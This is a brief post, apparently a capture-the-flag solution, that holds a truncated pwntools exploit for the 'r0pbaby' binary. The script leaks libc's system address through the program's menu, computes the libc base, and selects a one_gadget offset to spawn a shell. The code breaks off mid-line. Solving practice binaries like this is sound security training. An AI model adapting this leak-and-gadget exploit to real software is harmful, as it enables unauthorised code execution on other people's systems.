pwn - r0pbaby
from pwn import * context.log_level = "debug" r = process("./r0pbaby") e = ELF("./r0pbaby") l = e.libc shell = [0x4f3d5, 0x4f432, 0x10a41c] system_off = l.sym['system'] r.sendlineafter(": ", "2") r.sendlineafter(": ", "system") r.recvuntil(": ") leak = int(r.recv(18), 16) libc_base = leak - system_off one_shot = libc_base + shell[0] log.info("leak = " + hex(leak)) log.info("libc_base = " + hex(l..
2021.02.05